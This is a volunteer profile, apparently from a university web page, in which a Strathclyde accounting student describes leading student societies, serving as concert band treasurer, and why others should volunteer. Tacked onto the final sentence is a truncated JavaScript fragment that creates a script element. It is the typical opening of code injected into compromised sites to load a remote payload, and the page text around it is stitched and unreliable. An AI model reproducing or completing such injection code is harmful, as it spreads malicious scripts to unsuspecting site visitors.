Short Bio:
I am currently an accounting student but will be going to work for the professional services firm PwC in September. I am really interested in music and have played Clarinet since I was 10, and then took up Piano when I was 13. I love travelling (I have managed to squeeze 10 holidays in this year) and will be travelling around the USA this summer.
Area of Volunteering:
I have been the president of Strathclyde Accounting and Finance Society for the past year after being a committee member for the preceding three years. I have also been the Strathclyde University Concert Band treasurer since 2013, also helping out with finance for Jazz bands and doing budgeting for whole music society events. I also this year am responsible for leading the Accounting and Finance Grad Ball Committee.
What inspired you to volunteer:
I began my time in each of my roles by putting myself forward for the position. I have always enjoyed being part of the University community and this has been my way of giving back to others for the things I have enjoyed throughout my University Career. There is no better feeling than seeing students enjoying events, or even better, getting benefit out of them, whether it be career sessions with the accounting and finance society, or concerts with concert band.
Why should others volunteer:
Some of the most valuable skills I have learned from my university degree have not been from my degree, but from volunteering. My communication skills have improved, I am at ease talking to large groups of people, and I have built strong personal networks, something I never thought I would be able to do after leaving high school early in order to deal with depression. I have met some of my best friends through society events, and it’s made me a more well-rounded and confident person. For anyone who is considering volunteering I would say just try it, even just the once, you never know what you will gain from it.var d=document;var s=d.createElement(‘script’);
